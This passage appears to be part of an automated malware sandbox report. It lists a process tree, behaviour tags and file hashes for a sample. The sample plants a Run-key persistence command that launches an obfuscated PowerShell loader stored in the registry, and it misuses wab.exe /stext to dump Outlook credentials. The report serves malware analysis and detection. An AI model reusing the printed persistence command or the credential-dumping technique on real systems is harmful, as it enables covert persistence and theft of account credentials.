PID:3680 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"5⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kolinski" /t REG_EXPAND_SZ /d "%Siestas% -w 1 $Macrorhamphosidae=(Get-ItemProperty -Path 'HKCU:\Disputeredes\').Semimachine;%Siestas% ($Macrorhamphosidae)"6⤵
- Adds Run key to start application
- Modifies registry key
PID:3408 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bmnddfrn"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mgsweybhmfe"5⤵PID:4248
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mgsweybhmfe"5⤵
- Accesses Microsoft Outlook accounts
PID:5072 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wjygfqmaioxwboe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5365f45018b7bcc98591979d6c4b23752
SHA1073aff125450845105f5daa7d0e7cc24ee8bbca5
SHA25627be905cdbf87c23851d00d61afd5fcfe5c72b1de227ac7d8c0dc5c7583c9a6e
SHA5124bd0d2266c624b9ad40e9ba6cb4d63debd12f46f5c27afae3bfc20e3e7f5e9f9c88f83151166324223c5889034a4d70652cf747f6943af011191c64c28e18703
-
Filesize
476KB
MD55b31fdcca43851229c6ad5c0d5124d9e
SHA195243324bfd6acd008518e233e5ac3a7a29e67a5
SHA256c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842
SHA512e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5
-
Filesize
144B
MD5431cd2536a190a1c4f7b0038f9fa3e46
SHA1d7b7dc357b619008284bb09d56b88b6ab8f74eb3
SHA2566cdb5757c487eb32b35e86e1c86725f55a8c443ceffd0adbf2f9ae54a44b762c
SHA5124135eb3f0c395abc29e419d34c1ad2e34d98b3cf1042e53b0301e6293a05f343e27a04928702a08a9ac00bb889bddd4cf2fb0977a8abf6ff9706afa337387325